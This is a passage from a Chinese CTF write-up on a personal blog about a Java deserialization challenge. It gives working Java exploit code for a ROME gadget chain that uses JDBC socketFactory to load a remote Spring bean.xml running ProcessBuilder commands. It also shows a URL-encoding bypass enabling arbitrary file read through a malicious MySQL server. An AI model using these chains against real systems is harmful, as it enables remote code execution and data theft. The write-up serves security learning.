class="keyword">void</span> <span class="title function_">setFieldValue</span><span class="params">(Object obj, String field, Object arg)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">Field</span> <span class="variable">f</span> <span class="operator">=</span> obj.getClass().getDeclaredField(field);</span><br><span class="line">        f.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        f.set(obj, arg);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>有个小细节就是writeUTF和writeInt需要放在writeObject的前面，否则写不进去。并且Database类所在位置需要和题目一一对应：<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679547871416-602a1c29-d3df-43cb-8f7e-81e76fd80713.png#averageHue=%23393a36&clientId=u7e8aa54c-a67b-4&from=paste&height=315&id=uae888728&name=image.png&originHeight=315&originWidth=1886&originalType=binary&ratio=1&rotation=0&showTitle=false&size=842773&status=done&style=none&taskId=u0602cc91-7fb1-4782-a19d-7b4354cc584&title=&width=1886" alt="image.png"><br>输出好后得到一串BASE64编码，我们直接往题目中传参<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679547906978-294f83be-b64a-4792-8341-bdbcfe1216f6.png#averageHue=%23c5c5c5&clientId=u7e8aa54c-a67b-4&from=paste&height=1294&id=u3f6e48d3&name=image.png&originHeight=1294&originWidth=2558&originalType=binary&ratio=1&rotation=0&showTitle=false&size=214270&status=done&style=none&taskId=ua26a5817-26b4-4866-9d86-b941ca22d22&title=&width=2558" alt="image.png"><br>赛博功夫点到为止，很喜欢这个地方的提示呀，这就说明你的利用链大概率触发成功了，而计算机确实也弹出了</p>
<h3 id="流程分析"><a href="#流程分析" class="headerlink" title="流程分析"></a>流程分析</h3><p>对于前半段ROME就不分析了，这个在西湖论剑的easy_api中给出了，我们直接看调用getConnection后发生了什么（Rome链会调用任意get和set)<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679548128579-b27341e4-7b41-473a-b94c-0810228181df.png#averageHue=%232b2c27&clientId=u7e8aa54c-a67b-4&from=paste&height=347&id=u77b288ac&name=image.png&originHeight=347&originWidth=1909&originalType=binary&ratio=1&rotation=0&showTitle=false&size=919750&status=done&style=none&taskId=u83db2233-6bec-4d32-b16a-ad3c0049695&title=&width=1909" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679548140018-ebd2bfb2-4749-481f-a189-f914a38731bf.png#averageHue=%23292a27&clientId=u7e8aa54c-a67b-4&from=paste&height=907&id=u1d12c26e&name=image.png&originHeight=907&originWidth=1851&originalType=binary&ratio=1&rotation=0&showTitle=false&size=2220013&status=done&style=none&taskId=u6825826a-cd09-46de-b622-8db0fa3efd9&title=&width=1851" alt="image.png"><br>进入getConnection方法<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679548161432-42abdc99-c6e7-437f-ba2f-02f49ff2dca3.png#averageHue=%23282b28&clientId=u7e8aa54c-a67b-4&from=paste&height=768&id=u3b6aab51&name=image.png&originHeight=768&originWidth=1854&originalType=binary&ratio=1&rotation=0&showTitle=false&size=1860472&status=done&style=none&taskId=u922e9445-830d-464c-ae3e-559c7112769&title=&width=1854" alt="image.png"><br>在里面调用了makeconnection方法，准备进行连接初始化<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679548179027-3a766b4c-4a5e-43f8-bc05-517c9aba151e.png#averageHue=%2332332d&clientId=u7e8aa54c-a67b-4&from=paste&height=159&id=u5c4af31f&name=image.png&originHeight=159&originWidth=1117&originalType=binary&ratio=1&rotation=0&showTitle=false&size=262330&status=done&style=none&taskId=u975fb57e-a220-4b05-b9d2-3421a9c9474&title=&width=1117" alt="image.png"><br>Pgconnection方法<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679548203307-ea62384e-8c43-497c-96d0-3f6144e3e16d.png#averageHue=%232a2c29&clientId=u7e8aa54c-a67b-4&from=paste&height=1162&id=u3c64e404&name=image.png&originHeight=1162&originWidth=1852&originalType=binary&ratio=1&rotation=0&showTitle=false&size=2836569&status=done&style=none&taskId=ud846c7a1-f2f6-46db-9ad4-f7fb9e4da28&title=&width=1852" alt="image.png"><br>openconnection打开一个连接<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679548216427-4b37f6d4-a00c-4dd0-841d-cd362b922692.png#averageHue=%232f2f2a&clientId=u7e8aa54c-a67b-4&from=paste&height=294&id=u6d17e01a&name=image.png&originHeight=294&originWidth=1347&originalType=binary&ratio=1&rotation=0&showTitle=false&size=581617&status=done&style=none&taskId=u56fa7479-4973-4c50-b2d3-fdab7d0418c&title=&width=1347" alt="image.png"><br>调用其实现类<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679548242412-dfc2d14d-bb5e-40bc-9b3f-7330918bd97d.png#averageHue=%23292b27&clientId=u7e8aa54c-a67b-4&from=paste&height=802&id=udc044da8&name=image.png&originHeight=802&originWidth=1802&originalType=binary&ratio=1&rotation=0&showTitle=false&size=1926003&status=done&style=none&taskId=uac0a0c8f-b8e0-4c78-8c93-6af3238f0d5&title=&width=1802" alt="image.png"><br>在getSocktFacotry中把CPX类传入了instantiate方法中，准备进行初始化<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679548278354-8c082933-7244-4faf-a5ec-84706d73a9c8.png#averageHue=%23292b27&clientId=u7e8aa54c-a67b-4&from=paste&height=1014&id=u9fe5f430&name=image.png&originHeight=1014&originWidth=1827&originalType=binary&ratio=1&rotation=0&showTitle=false&size=2454654&status=done&style=none&taskId=u124db4dc-9b28-47fa-8d79-09da194d184&title=&width=1827" alt="image.png"><br>这边调用了CPX的构造方法实例化，然后加载远程的bean.xml文件，准备的文件内容如下</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">beans</span> <span class="attr">xmlns</span>=<span class="string">&quot;http://www.springframework.org/schema/beans&quot;</span></span></span><br><span class="line"><span class="tag">       <span class="attr">xmlns:xsi</span>=<span class="string">&quot;http://www.w3.org/2001/XMLSchema-instance&quot;</span></span></span><br><span class="line"><span class="tag">       <span class="attr">xmlns:p</span>=<span class="string">&quot;http://www.springframework.org/schema/p&quot;</span></span></span><br><span class="line"><span class="tag">       <span class="attr">xsi:schemaLocation</span>=<span class="string">&quot;http://www.springframework.org/schema/beans</span></span></span><br><span class="line"><span class="string"><span class="tag">        http://www.springframework.org/schema/beans/spring-beans.xsd&quot;</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--    普通方式创建类--&gt;</span></span><br><span class="line">   <span class="tag">&lt;<span class="name">bean</span> <span class="attr">id</span>=<span class="string">&quot;exec&quot;</span> <span class="attr">class</span>=<span class="string">&quot;java.lang.ProcessBuilder&quot;</span> <span class="attr">init-method</span>=<span class="string">&quot;start&quot;</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">constructor-arg</span>&gt;</span></span><br><span class="line">          <span class="tag">&lt;<span class="name">list</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">value</span>&gt;</span>bash<span class="tag">&lt;/<span class="name">value</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">value</span>&gt;</span>-c<span class="tag">&lt;/<span class="name">value</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;<span class="name">value</span>&gt;</span>calc.exe<span class="tag">&lt;/<span class="name">value</span>&gt;</span></span><br><span class="line">          <span class="tag">&lt;/<span class="name">list</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;/<span class="name">constructor-arg</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">bean</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">beans</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>随后便弹出计算器</p>
<h2 id="（2）非预期-编码绕过URL任意文件读取"><a href="#（2）非预期-编码绕过URL任意文件读取" class="headerlink" title="（2）非预期 | 编码绕过URL任意文件读取"></a>（2）非预期 | 编码绕过URL任意文件读取</h2><p>我们可以自己在本地实验，一般的jdbc url是<code>jdbc://mysql/xxxxxx</code>这种形式，而mysql这个字段可以进行url编码，在进行解析时会自动解码，因此得以绕过<br>思路大致上是和上半段一样的，因此POC很容易构造如下：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.example.ezjaba.exp;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.example.ezjaba.Connection.Database;</span><br><span class="line"><span class="keyword">import</span> com.rometools.rome.feed.impl.ToStringBean;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xpath.internal.objects.XString;</span><br><span class="line"><span class="keyword">import</span> org.springframework.aop.target.HotSwappableTargetSource;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">exp2</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;;</span><br><span class="line">        <span class="type">Database</span> <span class="variable">database</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Database</span>();</span><br><span class="line">        setFieldValue(database,<span class="string">&quot;database&quot;</span>,<span class="string">&quot;%6d%79%73%71%6c&quot;</span>);</span><br><span class="line">        <span class="comment">//setFieldValue(database,&quot;database&quot;,&quot;mysql&quot;);</span></span><br><span class="line">        setFieldValue(database,<span class="string">&quot;host&quot;</span>,<span class="string">&quot;127.0.0.1&quot;</span>);</span><br><span class="line">        setFieldValue(database,<span class="string">&quot;username&quot;</span>,<span class="string">&quot;fileread_c:\\\\windows\\\\win.ini&amp;maxAllowedPacket=655360&quot;</span>);</span><br><span class="line">        <span class="comment">//setFieldValue(database,&quot;username&quot;,&quot;boogipop&amp;characterEncoding=utf8&amp;useSSL=false&amp;queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&amp;autoDeserialize=true&quot;);</span></span><br><span class="line">        <span class="type">ToStringBean</span> <span class="variable">toStringBean</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ToStringBean</span>(Database.class,database);</span><br><span class="line">        <span class="type">HotSwappableTargetSource</span> <span class="variable">h2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HotSwappableTargetSource</span>(<span class="keyword">new</span> <span class="title class_">XString</span>(<span class="string">&quot;123&quot;</span>));</span><br><span class="line">        <span class="type">HotSwappableTargetSource</span> <span class="variable">h1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HotSwappableTargetSource</span>(toStringBean);</span><br><span class="line">        <span class="comment">// 执行序列化与反序列化，并且返回序列化数据</span></span><br><span class="line">        HashMap&lt;Object, Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">        map.put(h1,h1);</span><br><span class="line">        map.put(h2,h2);</span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">bs</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">out</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(bs);</span><br><span class="line">        out.writeUTF(<span class="string">&quot;axb&quot;</span>);</span><br><span class="line">        out.writeInt(<span class="number">2022</span>);</span><br><span class="line">        out.writeObject(map);</span><br><span class="line">        <span class="comment">// 输出序列化的Base64编码字符</span></span><br><span class="line">        Base64Encode(bs);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> ByteArrayOutputStream <span class="title function_">unSerial</span><span class="params">(Object o)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">bs</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">out</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(bs);</span><br><span class="line">        out.writeObject(o);</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">in</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(bs.toByteArray()));</span><br><span class="line">        in.readObject();</span><br><span class="line">        in.close();</span><br><span class="line">        <span class="keyword">return</span> bs;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">Base64Encode</span><span class="params">(ByteArrayOutputStream bs)</span>&#123;</span><br><span class="line">        <span class="type">byte</span>[] encode = Base64.getEncoder().encode(bs.toByteArray());</span><br><span class="line">        <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">String</span>(encode);</span><br><span class="line">        System.out.println(s);</span><br><span class="line">        System.out.println(s.length());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">setFieldValue</span><span class="params">(Object obj, String field, Object arg)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">Field</span> <span class="variable">f</span> <span class="operator">=</span> obj.getClass().getDeclaredField(field);</span><br><span class="line">        f.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        f.set(obj, arg);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679551070232-06e76374-c8b1-47f8-9125-91fc9dea22ce.png#averageHue=%23303026&clientId=uc8122058-8f7d-4&from=paste&height=800&id=u39786fbc&name=image.png&originHeight=800&originWidth=1499&originalType=binary&ratio=1&rotation=0&showTitle=false&size=1382020&status=done&style=none&taskId=u28b669b9-154e-4074-b403-f7d6a45dad5&title=&width=1499" alt="image.png"><br>由于这里没有设置flag所以读一个win.ini来当例子，详细可以看<br>这里介绍了JDBC任意文件读取的原理和利用，mysql恶意服务器是在github上开源的fake_mysql</p>

    </div>

    
    <div class="about">
        <h1>About this Post</h1>
        <div class="details">
            <p>This post is written by Boogipop, licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc/4.0">CC BY-NC 4.0</a>.</p>
        </div>
        
        <p class="tags">
            
            <i class="icon"></i>
            <a href="/tags/WriteUp/" class="tag">#WriteUp</a><a href="/tags/Java/" class="tag">#Java</a>
        </p>
        
    </div>
    

    <div class="container post-prev-next">
        
        <a href="/2023/03/29/TCTF2022%20_%20Hessian-onlyJdk/" class="next">
            <div>
                <div class="text">
                    <p class="label">Next</p>
                    <h3 class="title">TCTF2022 Hessian-onlyJdk</h3>
                </div>
            </div>
        </a>
        
        
        <a href="/2023/03/29/Shiro%20_%20CommonBeanUtils%E5%88%A9%E7%94%A8%E9%93%BE/" class="prev">
            <div>
                <div class="text">
                    <p class="label">Previous</p>
                    <h3 class="title">ShiroのCommonBeanUtils利用链</>
                </div>
            </div>
        </a>
        
    </div>

    
        
        
        <script src="https://giscus.app/client.js" data-repo="Boogipop/Boogipop.github.io" data-repo-id="R_kgDOIFi78g" data-category="Announcements" data-category-id="DIC_kwDOIFi78s4Cav9f" data-mapping="pathname" data-strict="1" data-reactions-enabled="1" data-emit-metadata="0" data-input-position="top" data-theme="preferred_color_scheme" data-lang="zh-CN" crossorigin="anonymous" async></script>
        
    
</article>

        <footer>
    <div class="inner">
        <div class="links">
            
            <div class="group">
                <h2 class="title">Blog</h2>
                
                <a href="/" class="item">Blog</a>
                
                <a href="/archives" class="item">Archives</a>
                
                <a href="/tags" class="item">Tags</a>
                
                <a href="/categories" class="item">Categories</a>
                
                <a href="/search" class="item">Search</a>
                
                <a href="/friends" class="item">Friends</a>
                
                <a href="/about" class="item">About</a>
                
                <a href="/atom.xml" class="item">RSS</a>
                
            </div>
            
            <div class="group">
                <h2 class="title">Projects</h2>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/rsa-cli" class="item">RSA CLI</a>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/hexo-theme-cupertino" class="item">Hexo Theme Cupertino</a>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/a-calendar" class="item">A Calendar</a>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom/auto-mirroring-bucket" class="item">Auto Mirroring Bucket</a>
                
            </div>
            
            <div class="group">
                <h2 class="title">Me</h2>
                
                <a target="_blank" rel="noopener" href="https://github.com/MrWillCom" class="item">GitHub</a>
                
                <a target="_blank" rel="noopener" href="https://codepen.io/mrwillcom" class="item">CodePen</a>
                
                <a target="_blank" rel="noopener" href="https://www.patreon.com/MrWillCom" class="item">Patreon</a>
                
                <a target="_blank" rel="noopener" href="https://noc.social/@MrWillCom" class="item">Mastodon</a>
                
                <a target="_blank" rel="noopener" href="https://discord.gg/UKuFDjcfY8" class="item">Discord</a>
                
                <a href="mailto:mr.will.com@outlook.com" class="item">Email</a>
                
            </div>
            
        </div>
        <span>&copy; 2025 Boogipop<br>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> </span>
        
        
            <br>
            <div class="color-scheme-toggle" role="radiogroup" id="theme-color-scheme-toggle">
                <label>
                    <input type="radio" value="light">
                    <span>Light</span>
                </label>
                <label>
                    <input type="radio" value="dark">
                    <span>Dark</span>
                </label>
                <label>
                    <input type="radio" value="auto">
                    <span>Auto</span>
                </label>
            </div>
        
    </div>
</footer>


        
<script src="/js/main.js"></script>

        
        
        

        
        <script src="https://unpkg.com/scrollreveal"></script>
		
        <script>
            window.addEventListener('load', () => {
                ScrollReveal({ delay: 250, reset: true, easing: 'cubic-bezier(0, 0, 0, 1)' })
                ScrollReveal().reveal('.post-list-item .cover-img img')
                ScrollReveal().reveal('.post-list-item, .card, .content p img, .content .block-large img', { distance: '60px', origin: 'bottom', duration: 800 })
            })
        </script>
        
    </body>
</html>